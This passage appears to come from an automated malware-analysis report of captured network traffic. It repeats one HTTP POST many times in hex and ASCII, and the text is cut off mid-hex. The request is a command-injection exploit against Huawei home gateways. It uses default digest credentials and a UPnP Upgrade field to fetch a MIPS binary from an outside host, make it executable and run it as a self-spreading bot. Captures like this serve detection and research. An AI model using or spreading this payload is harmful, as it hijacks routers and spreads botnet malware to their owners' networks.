4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 78 36 61 72 63 68 2e 6d 6c 20 2d 6c 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 2d 72 20 2f 64 33 34 2f 64 33 34 74 68 6e 33 74 32 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 3b 20 2f 74 6d 70 2f 2e 64 65 61 74 68 6e 65 74 20 68 75 61 77 65 69 2e 73 65 6c 66 72 65 70 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g x6arch.ml -l /tmp/.deathnet -r /d34/d34thn3t2.mips; /bin/busybox chmod 777 * /tmp/.deathnet; /tmp/.deathnet huawei.selfrep)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
        Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 